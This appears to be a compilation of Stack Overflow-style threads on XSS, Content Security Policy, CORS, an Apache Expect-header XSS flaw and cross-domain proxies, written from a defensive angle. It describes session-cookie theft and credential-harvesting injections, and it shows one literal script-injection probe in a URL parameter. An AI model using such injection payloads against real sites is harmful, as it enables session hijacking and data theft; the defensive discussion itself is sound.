Can XSS be prevented 100% by setting the content security policy as default-src 'self'? Is there any way XSS can happen in that case? One possibility I can think of is injecting user input into one of your scripts dynamically at the server-side, do you agree? Are there any other vulnerabilities you can think of?
No, CSP is not a magic bullet. It should be one line of defense, not the entire defense. If properly configured it can help
preventing usable XSS where the payload, whether persistent or reflected must be small and therefore would usually just create a script element and inject external code
avoiding data extraction and misuse as platform to attack other sites. Depending on how your application works, access to your backend service may suffice to extract data, for instance, if your users can write blog posts an attacker could create a new post with the data it needs to extract, wait for a signal that the data has been grabbed (via a comment for instance) and delete the post again, all without communicating with external servers.
To answer the question, yes a modern browser with default-src 'self' can still execute user-controlled javascript: JSONP.
Of particular note is our lack of self in our source list. While
sourcing JavaScript from self seems relatively safe (and extremely
common), it should be avoided when possible.
There are edge cases that any developer must concern themselves with
when allowing self as a source for scripts. There may be a forgotten
JSONP endpoint that doesn’t sanitize the callback function name.
From http://githubengineering.com/githubs-csp-journey/
CSP should not be used as the only way to prevent XSS attack. This mechanism works only client side (If you save malicious data into your DB, then you can probably start infecting other systems that you integrating with) and it's not implemented by all browsers (http://caniuse.com/#search=csp).
To prevent XSS you should always validate input data and encode output data. You can also print warning message in JavaScript console to prevent somehow Self-XSS attacks (ex. open facebook page and turn on Chrome Developers Tools - look at the message in console).
Remember that the user input on the website is not the only source of XSS. Malicious data can also come from:
Importing data from files
Importing data from third party systems
Migration data from old system.
Cookies and http headers.
If you have appropriate validation and encoding of data (server side), then you can additionally apply browser mechanism such as: CSP, X-XSS-Protection or X-Content-Type-Options to increase your confidence about your system safety.
Related
Is it possible to send function to the new window and get result in parent window(and after that child window should be closed).
For example I have array with URL's.
var urls = ["first.com", "second.com", "third.com"...];
and function
function parse(url){...}
then I make cycle
for(var i=0; i<=n; i++){window.open(url[i];}
How can I send "parse" and get its result?
Based on the sample code provided, and the fact that the domains are different, I'm going to assume that you don't own all of the domains that you're trying to open...
You need to do a bit of research on cross site scripting, and the implications of this type of functionality. To get you started, here's the definition of cross site scripting, found here.
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to
send malicious code, generally in the form of a browser side script,
to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from
a user within the output it generates without validating or encoding
it.
TLDR: Simply put, if you don't own the domains, what you're trying to do is not possible client-side.
As mentioned by James Hill, this does not seem to be possible. If it helps, try web scraping to extract data from websites and process these data in functions at your own site.
There is already a chrome extension for web scraping:
https://chrome.google.com/webstore/detail/web-scraper/jnhgnonknehpejjnehehllkliplmbmhn
I understand there are lots of questions concerning Cross-Site Scripting on the SO and tried to read the most voted ones. Having read some webpages too I'm still unsure about all possibilities that this attack type can use. I don't ask how to sanitianize input, rather what one can expect.
In most examples given on SO and other pages there are two methods, where the simplest (eg. this one on PHPMaster) seams to be inserting some <script> code used for stealing cookies etc.
The other presented here by user Baba is to insert full <form> code structure, however it seems it should not work until user submits a form, however some JavaScript event like ... onmouseover='form.submit()'... might be used.
All network examples I've been able to check are only methods based on using some JavaScript code.
Is it possible to use other methods, say -- somehow -- changing the HTML, or even the server-side script?
I know one can obtaining this by SQL injection or just hacking on the server, but I mean only by manipulating (wrong handled) GET, POST requests -- or perhaps some other?
Cross-Site Scripting is not just about inserting JavaScript code into a web page. It is rather a general term for any injection of code that gets interpreted by the browser in the context of the vulnerable web page, see CWE-79:
During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.
An attacker could, for example, inject his own login form into an existing login page that redirects the credentials to his site. This would also be called XSS.
However, it is often easier and more promising to inject JavaScript as it can do both control the document and the victims browser. With JavaScript an attacker can read cookies and thus steal a victim’s session cookie to hijack the victim’s session. In certain cases, an attacker would even be able to execute arbitrary commands on the victim’s machine.
The attack vector for XSS are diverse but they all have in common that they are possible due to some improperly handled input. This can be either by parameters provided via GET or POST but also by any other information contained in the HTTP request, e.g. cookies or any other HTTP header fields. Some use a single injection point, others are split up to multiple injection points; some are direct, some are indirect; some are triggered automatically, some require certain events; etc.
I know one can obtaining this by SQL injection or just hacking on the server, but I mean only by manipulating (wrong handled) GET, POST requests -- or perhaps some other?
GET parameters and POST bodies are the primary vector for attacking a web application via HTTP requests, but there are others. If you aren't careful about file uploads, then I might be able to upload a Trojan. If you naively host uploaded files in the same domain as your website, then I can upload JS or HTML and have it run with same-origin privileges. Request headers are also inputs that an attacker might manipulate, but I don't know of successful attacks that abuse them.
Code-injection is a class of attacks that includes XSS, SQL Injection, Shell injection, etc.
Any time a GET or POST parameter that is controlled by an attacker is turned into code or a programming language symbol, you risk a code-injection vulnerability.
If a GET or POST parameter is naively interpolated into a string of SQL, then you risk SQL injection.
If a GET or POST parameter (or header like the filename in a file upload) is passed to a shell, then you risk shell injection and file inclusion.
If your application uses your server-side language's equivalent of eval with an untrusted parameter, then you risk server-side script injection.
You need to be suspicious of all your inputs, treat them as plain text strings, and when composing a string in another language, convert the plain text string into a substring in that target language by escaping. Filtering can provide defense in depth here.
XSS - is it only possible by using JavaScript?
No. VBScript can be injected in IE. Javascript can be injected indirectly via URLs and via CSS. Injected images can leak secrets hidden in the referrer URL. Injected meta tags or iframes can redirect to a phishing version of your site.
Systems that are vulnerable to HTTP response header splitting can be subverted by HTML & scripts injected into response headers like redirect URLs or Set-Cookie directives.
HTML embeds so many languages that you need to be very careful about including snippets of HTML from untrusted sources. Use a white-listing sanitizer if you must include foreign HTML in your site.
XSS is about javascript.
However to inject your malicious javascript code you have to use a vulnerability of the pages code which might be on the server or client side.
You can use CSP (content security policy) to prevent XSS in modern browses.
There is also a list of XSS tricks in the XSS Cheat Sheet. However most of those tricks won't work for modern browsers.
Webkit won't execute javascript if it is also part of the request.
For example demo.php?x=<script>alert("xss")</script> won't display an alert box even if it the script tag gets injected into the dom. Instead the following error is thrown:
"Refused to execute a JavaScript script. Source code of script found within request."
I have had a scan performed on my website looking for vulnerabilities, etc. The report was returned saying there was a risk of an XSS attack, I have looked in to my website code and the only issue I can find (which is causing a W3C validation error) is that I have accidentally added 'language="javascript"' to my script tag...could this have thrown the error which they have reported? I don't have any form inputs and it is not connected to a database.
Many thanks, in advance.
No, using language="javascript" on your script tags won't make an XSS vulnerability, even though it's bad practice. I can't discern what your possible XSS vulnerability comes from without any relevant code, unfortunately.
Any reputable consultant should make it clear in their report exactly what the risk is and how it is reproduced. I'd expect to see documented methodology, findings and conclusions.
If they can't demonstrate a risk then they can't say they have found one.
UPDATE:
Based on your comment I've found the following, which identifies this as a general vulnerability with the Apache webserver rather than your particular code. You should ask whoever manages your webhosting to comment.
A flaw in the handling of invalid Expect headers. If an attacker can influence the Expect header that a victim sends to a target site they could perform a cross-site scripting attack. It is known that some versions of Flash can set an arbitrary Expect header which can trigger this flaw. Not marked as a security issue for 2.0 or 2.2 as the cross-site scripting is only returned to the victim after the server times out a connection.
see:
http://www.rapid7.com/vulndb/lookup/http-apache-expect-header-xss
also:
http://www.iss.net/security_center/reference/vuln/HTTP_Apache_Expect_XSS.htm
UPDATE 2:
The following is a description of the vulnerability (link). Ask your hosting people to check their servers are properly patched.
In May 2006 a reporter found a bug in Apache where an invalid Expect header sent
to the server (Apache 1.3.3 onwards) would be returned to the user in an error
message, unescaped. This could allow a cross-site scripting attack only if a
victim can tricked into connecting to a site and sending such a carefully
crafted Expect header. Whist browsers do not provide this functionality, it was
recently discovered that Flash allows you to make a connection with arbitrary
headers. The attack mechanism is therefore:
User is tricked into visiting a malicious web site with a flash-enabled browser
Malicious web site uses a flash movie to make a connection to the target site
with custom Expect header
This results in cross-site scripting (attacker could steal your cookies from
the third party site, or inject content etc)
If you're sure that no user input can ever make its way to be served on your pages, then there can't be any XSS.
I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.
http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious, that you can use a proxy to get XML or JavaScript on another domain with XMLHttpRequest without running into same-origin restrictions. However, I do not hear about disadvantages over other methods -- are there, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
Overhead -- both for the user (who know hsa to wait for you server to make and receive data from the proxied source) and you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model -- potentially allowing the user to be compromised -- so unless you absolutely trust the server you are communicating with (that means no random ads, no user defined content in the page[s] you are proxying) you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.